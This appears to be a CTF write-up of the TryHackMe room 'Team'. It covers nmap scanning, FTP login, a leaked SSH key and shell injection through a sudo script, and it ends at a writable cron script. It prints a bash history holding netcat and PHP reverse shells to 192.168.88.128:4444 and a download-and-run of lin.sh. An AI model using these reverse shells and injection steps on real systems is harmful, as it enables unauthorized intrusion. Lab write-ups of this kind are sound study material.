# Nmap 7.91 scan initiated Tue May 11 15:15:28 2021 as: nmap -sSVC -p- -oA nmap_full -v 10.10.103.106 Nmap scan report for 10.10.103.106 Host is up (0.027s latency). Not shown: 65532 filtered ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 79:5f:11:6a:85:c2:08:24:30:6c:d4:88:74:1b:79:4d (RSA) | 256 af:7e:3f:7e:b4:86:58:83:f1:f6:a2:54:a6:9b:ba:ad (ECDSA) |_ 256 26:25:b0:7b:dc:3f:b2:94:37:12:5d:cd:06:98:c7:9f (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) | http-methods: |_ Supported Methods: POST OPTIONS HEAD GET |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works! If you see this add 'te... Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Tue May 11 15:18:09 2021 -- 1 IP address (1 host up) scanned in 161.56 seconds
So I found nothing. The thing is that I always use the id of the room as local
domain for TryHackme (eg. here teamcw.thm) but it seems the only configured
vhost that can answer is team.thm, there is no fallback on anything else.
1 2
$ grep team /etc/hosts 10.10.114.89 teamcw.thm team.thm
There is a file http://team.thm/scripts/script.txt containing a backup of a bash
script. In a true webapp /scripts/ only contains .js files so you won't
normally enumerate for .txt here and since when anyone would store a bash
script here? Plus the file should be named ftp.sh or ftp-backup.sh not
script.txt. We can shame the author dalemazza for this scenario.
#!/bin/bash read -p "Enter Username: " REDACTED read -sp "Enter Username Password: " REDACTED echo ftp_server="localhost" ftp_username="$Username" ftp_password="$Password" mkdir /home/username/linux/source_folder source_folder="/home/username/source_folder/" cp -avr config* $source_folder dest_folder="/home/username/linux/dest_folder/" ftp -in$ftp_server <<END_SCRIPT quote USER $ftp_username quote PASS $decrypt cd $source_folder !cd $dest_folder mget -R * quit # Updated version of the script # Note to self had to change the extension of the old "script" in this folder, as it has creds in
lol this dummy comment at the end trying to justify this broken scenario.
My bad it's not even that it's a hint to tell you to find a backup file for this
script (with a different extension) to find an unedited version containing the
credentials.
$ ftp team.thm Connected to teamcw.thm. 220 (vsFTPd 3.0.3) Name (team.thm:noraj): ftpuser 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxrwxr-x 2 65534 65534 4096 Jan 15 21:25 workshare 226 Directory send OK. ftp> ls workshare 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. -rwxr-xr-x 1 1002 1002 269 Jan 15 21:24 New_site.txt 226 Directory send OK. ftp> cd workshare 250 Directory successfully changed. ftp> get New_site.txt 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for New_site.txt (269 bytes). 226 Transfer complete. 269 bytes received in 4,7e-05 seconds (5,46 Mbytes/s)
New_site.txt
1 2 3 4 5 6 7
Dale I have started coding a new website in PHP for the team to use, this is currently under development. It can be found at ".dev" within our domain.
Also as per the team policy please make a copy of your "id_rsa" and place this in the relevant config file.
Gyles
I guess he made a mistake and meant dev (dev.) sub-domain rather than .dev
in the domain.
The nonsense continue in the SSH server config /etc/ssh/sshd_config we can
find dale SSH private key in comment. This is totally not how the SSH server
config works. The author dalemazza hadn't the skills to find how it works so
he just decided the dump the key in comment. How unrealistic. Plus to write in
/etc/ssh/sshd_config you must have root permission so we'll see in next steps
if dale is not sudoers it would mean the scenario would be even more broken.
$ ssh dale@team.thm -i id_rsa_dale Last login: Mon Jan 18 10:51:32 2021 dale@TEAM:~$ id uid=1000(dale) gid=1000(dale) groups=1000(dale),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd),113(lpadmin),114(sambashare),1003(editors) dale@TEAM:~$ sudo -l Matching Defaults entries for dale on TEAM: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User dale may run the following commands on TEAM: (gyles) NOPASSWD: /home/gyles/admin_checks
What did I tell you? dale is sudoer but can only run /home/gyles/admin_checks
command as gyles so he couldn't have edited /etc/ssh/sshd_config as root.
I fear this nonsense never end.
Before trying to EoP let's dump the flag.
1 2
dale@TEAM:~$ cat user.txt THM{edited}
lol .bash_history has not been blocked so we can find the next steps and
know how to EoP... seeing how the author prepared the box and tested it.
id uname -a exit clear exyt exit ls -la chmod 700 .ssh cd .ssh ls -la chmod 600 authorized_keys sudo chmod 600 authorized_keys ls -l0a ls -la sudo chown authorized_keys sudo chown dale:dale authorized_keys sudo chown dale:dale id_rsa ls -la chmod 644 id_rsa ls -la netstat -tulpn systemctl start vsftpd netstat -tulpn sudo systemctl start vsftpd netstat -tulpn sudo ufw sudo ufw app list sudo ufw allow `vsftpd` sudo ufw allow 'vsftpd' sudo ufw allow 'vsftpd.service' sudo ufw allow vsftpd sudo ufw allow 21 sudo ufw netstat -tulpn sudo netstat -tulpn sudo apt install vsftpd sudo systemctl enable vsftpd netstat -tulpn sudo systemctl start vsftpd netstat -tulpn ftp localhost cat /etc/vsftpd.conf less /etc/vsftpd.conf sudo systemctl status vsftpd ls /etc/
ls /etc/ | grep vsftpd] ls /etc/ | grep vsftpd ls -la /etc/ | grep vsftpd less /etc/vsftpd.conf sudo nano /etc/vsftpd.conf sudo systemctl status vsftpd sudo systemctl restart vsftpd sudo systemctl status vsftpd sudo chown nobody:nogroup /home/ftpuser cd /home ls -la cd ftpuser/ ls ls -la sudo chown nobody:nogroup workshare/ ls -la sudo nano /etc/vsftpd.conf clear# clear ls ls -la sudo -l su root cd ls -la nano user.txt cat user.txt clear ls -la reboot sudo -l exity exit id ls sudo -l sudo -u gyles /home/gyles/admin_checks clear cd /var/stats/ ls ls -la sudo chmod 666 stats.txt ls -la sudo chown dale:editors stats.txt ls -la cd sudo -u gyles /home/gyles/admin_checks ls -la /var/stats/ rm /var/stats/stats-2021-01-15-21-59.bak clear ls -la sudo -u gyles /home/gyles/admin_checks clear ls pwd ls -la netstat -tulpn cat user.txt su root ls wget wget http://192.168.88.128:8000/lin.sh . chmod +x lin.sh ./lin.sh sudo -u#-1 bash ls rm lin.sh ls -la sudo -l sudo -u gyles /home/gyles/admin_checks clear exit ls cd ls ls -la sudo shutdown su root ls cd /var/www ls clear ls -la less /etc/apache2/apache2.conf cd html ls nano index.html sudo nano index.html su root ls su gyles ls sudo -l sudo -u gyles /home/gyles/admin_checks ls ./php ls cd .. ls ls -ls su gyles dale id ls ls cd ls ls -la su root ls user id whoami cd cd ls cd ls su root cd ls cd cd .. ls ls -la sudo -l sudo -u gyles /home/gyles/admin_checks ls -la /bin/ | grep bash su root su root ls reboot shutdown cd /home/gyes cd /home/gyles/ ls -la su root su rrot su root sudo -l sudo -u gyles /home/gyles/admin_checks clear sudo -u gyles /home/gyles/admin_checks clear cd /var/backups/ ls cd www ls -la cd dev/ ls -ls cat /home/gyles/admin_checks cd .. cd stats/ ls -la rm stats-* ls -la shutdown
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
$ cat /home/gyles/admin_checks #!/bin/bash
printf "Reading stats.\n" sleep 1 printf "Reading stats..\n" sleep 1 read -p "Enter name of person backing up the data: " name echo $name >> /var/stats/stats.txt read -p "Enter 'date' to timestamp the file: " error printf "The Date is " $error 2>/dev/null
The error input is used as command directly so we can inject a shell if we want.
1 2 3 4 5 6
dale@TEAM:~$ sudo -u gyles /home/gyles/admin_checks Reading stats. Reading stats.. Enter name of person backing up the data: noraj Enter 'date' to timestamp the file: /bin/bash -i The Date is uid=1001(gyles) gid=1001(gyles) groups=1001(gyles),1003(editors),1004(admin)
Then upgrade to PTY with python3 -c 'import pty;pty.spawn("/bin/bash")'.
cd ls -la nano admin_checks scp dale@192.168.88.129:/home/gyles/admin_checks /home/gyles/admin_checks ls ls -la cat admin_checks su root ls cd ls -la scp gyles@192.168.88.129:/home/gyles/admin_checks /home/gyles/ scp root@192.168.88.129:/home/gyles/admin_checks /home/gyles/ sudo scp root@192.168.88.129:/home/gyles/admin_checks /home/gyles/ su root ls cat /etc/shells echo $SHELL chsh -s /bin/bash echo $SHELL exit ls echo $SHELL ls sudo -l cat /etc/crontab which nc nc nc 192.168.88.128 -e /bin/bash nc 192.168.88.128 < /bin/bash nc -e ps aux | grep root ls su root ls cd ls ls -la su root id cd /opt ls -la cd admin_stuff/ ls ./blog_backup.sh clear ls ls -la su root ./nc -e /bin/bash 192.168.88.128 4444 ./nc -e /bin/bash -p 192.168.88.128 4444 ./nc -e "/bin/bash -p" 192.168.88.128 4444 ls -la ./nc -e /bin/sh 192.168.88.128 4444 ls sudo install -m =xs $(netcat-tradtional) sudo install -m =xs $(which nc) ls -la reboot shutdown nc -e clear ./nc -e /bin/bash localhost sudo chown :admin nc ./nc -e /bin/bash localhost ./nc -e /bin/bash 192.168.88.128 4444 clear ls -la su root cd /opt/admin_stuff/ ls -la id clear ./nc -e /bin/bash 192.168.88.128 4444 ls -la sudo chmod g+s nc ls ls -la ./nc -e /bin/bash 192.168.88.128 4444 ls -la cat /etc/crontab php which php ls -la php -r '$sock=fsockopen("192.168.88.128",4444);exec ("/bin/sh -i <&3 >&3 2>&3");' exit id whoami pwd cd /root ls cat root.txt rm test.txt rm log.log ls -la exi exit id /bin/bash -p exit id /bin/bash exit ls ls -la cd /opt/admin_stuff/ ls -la which php sudo cp /usr/bin/php . ls -la sudo g+s php sudo chmod g+s php ls -la ./php -r '$sock=fsockopen("192.168.88.128",4444);exec ("/bin/sh -i <&3 >&3 2>&3");' ls -la sudo chown :admin php ls -la sudo chmod g+s php ls -la ./php -r '$sock=fsockopen("192.168.88.128",4444);exec ("/bin/sh -i <&3 >&3 2>&3");' ./php -r "pcntl_exec('/bin/sh', ['-p']);" sudo install -m =xs $(which php) . ls -la ./php -r "pcntl_exec('/bin/sh', ['-p']);" sudo chmod 002 nc ls -la sudo chmod 004 nc ls -la sudo chmod 005 nc ls -la sudo chmod 001 nc ls -la sudo chown :root nc ls -la sudo chown xs nc sudo chmod xs nc sudo chmod gu+s nc ls -la ./nc -e ./nc -e 192.168.88.128 4444 ./nc -e /bin/bash 192.168.88.128 4444 sudo add-apt-repository universe apt search netcat sudo install netcat-tradtional sudo install netcat-traditional sudo apt -get install netcat-traditional sudo apt-get install netcat-traditional nc -e which nc which nc-tradtional locate nc clear locate nc | grep netcat ls -la sudo apt-get remove netcat-traditional sudo install -m =xs $(which nc) . ls -la
which nc sudo apt-get install netcat-traditional cd /usr/bin ls -la ls -la | grep net ls -la | grep nc locate nc which nc cd /bin ls -la | grep nc cd /opt/admin_stuff/ sudo install -m =xs $(/bin/nc.traditional) . sudo install -m =xs /bin/nc.traditional . ls -la ./nc.traditional -e ./nc.traditional -e /bin/bash 192.168.88.128 4444 ./nc.traditional -e /bin/sh 192.168.88.128 4444 rm nc* sudo rm n* ls ls -la su dale cd /usr/local/bin/ ls -la sudo nano main_backup.sh cd /var/backups/ sudo mkdir team.thm ls -la cd www ls cd .. ls nano /usr/local/bin/main_backup.sh sudo nano /usr/local/bin/main_backup.sh ls -la rm team.thm/ rm -r team.thm/ sudo rm -r team.thm/ ls -la cd www ls -ls cd team cd team.thm/ ls -la date ls -la sudo rm * ls ls -la ls ls ls -la cat /usr/local/bin/main_backup.sh ls /opt/admin_stuff/./script.sh ls sudo chmmod +x /usr/local/bin/main_backup.sh sudo chmod +x /usr/local/bin/main_backup.sh ls sudo /opt/admin_stuff/./script.sh ls clear sudo rm * ls ls# ls ls -la ls nano /usr/local/bin/main_backup.sh cd /var/usr cd /usr/local/ ls -la sudo chown :admin bin sudo chmod 775 bin/ ls ls -la cd bin ls -la sudo chown :admin main_backup.sh sudo chmod 775 main_backup.sh ls -la nano main_backup.sh ls ls -la id nano main_backup.sh cd home cd ls -la ls l ls cat root.txt ls rm root.txt sudo rm root.txt nano /usr/local/bin/main_backup.sh ls /bin/bash ls cd /usr/local/sbin/ cat /usr/local/bin/main_backup.sh nano dev_backup.sh sudo nano dev.backup.sh ls /var/backups/www/ nano dev_backup.sh ls nano dev.backup.sh sudo nano dev.backup.sh sudo nano /opt/admin_stuff/script.sh sudo chmod +x dev.backup.sh ls ls -la cd /var/backups/ ls -la cd www ls cd dev/ ls ls -la rm * sudo rm * ls -la ls ls -la cat /usr/local/sbin/dev.backup.sh ls ls /var/www/ sudo nano /usr/local/sbin/dev.backup.sh sudo cat /usr/local/sbin/dev.backup.sh ls ls -la cd .. ls ls -la cd dev ls cd ../team.thm/ ls cd .. ls rm main rm -r main/ sudo rm -r main/ ls ls -la cd dev ls ls -la cd .. nano /usr/local/sbin/dev.backup.sh cat /usr/local/sbin/dev.backup.sh cat /usr/local/bin/main_backup.sh cat /opt/admin_stuff/script.sh nano /usr/local/sbin/dev.backup.sh UDO nano /usr/local/sbin/dev.backup sudo nano /usr/local/sbin/dev.backup sudo nano /usr/local/sbin/dev.backup.sh clear cd dev ls -la sudo nano /opt/admin_stuff/script.sh ls diff /usr/local/sbin/dev_backup.sh /usr/local/bin/main_backup.sh ls ls -la /usr/local/sbin/ cd /usr/local/sbin/ ls -la sudo chmod +x dev_backup.sh sudo rm dev.backup.sh ls -la cd /var/backups/www/dev/ ls cd .. ls -la cd /usr/local/ ls -la cd sbin/ ls ls -la nano dev_backup.sh ls cd ls sudo rm root.txt ls nano /usr/local/bin/main_backup.sh clear ls cd su root cronjob -l crontab -l
su root ls ls -la sudo chmod 770 admin_stuff/ ls -la cd admin_stuff/ ls -la sudo chmod 440 php ls -la sudo chmod 110 php ls -la sudo chmod gu+s php ls -la ./php sudo ./php clear ls -la ls ./php rm php ls sudo rm php ls -la cd .. ls ls -la cd admin_stuff/ su root lsa ls su dale id cd ls ls -la reboot su root su root
gyles@TEAM:~$ id uid=1001(gyles) gid=1001(gyles) groups=1001(gyles),1003(editors),1004(admin)
There is a script owned by root that is believed to be executed in a cron job:
1 2 3 4 5 6 7 8 9 10 11 12
gyles@TEAM:~$ ls -lh /opt/admin_stuff/script.sh -rwxr--r-- 1 root root 200 Jan 17 20:38 /opt/admin_stuff/script.sh gyles@TEAM:~$ cat /opt/admin_stuff/script.sh #!/bin/bash #I have set a cronjob to run this script every minute
dev_site="/usr/local/sbin/dev_backup.sh" main_site="/usr/local/bin/main_backup.sh" #Back ups the sites locally $main_site $dev_site
This is a wrapper calling two other scripts.
1 2 3 4
gyles@TEAM:~$ ls -lh /usr/local/sbin/dev_backup.sh -rwxr-xr-x 1 root root 64 Jan 17 19:42 /usr/local/sbin/dev_backup.sh gyles@TEAM:~$ ls -lh /usr/local/bin/main_backup.sh -rwxrwxr-x 1 root admin 65 Jan 17 20:36 /usr/local/bin/main_backup.sh
We notice that main_backup.sh is writable by the admin group that gyles is in.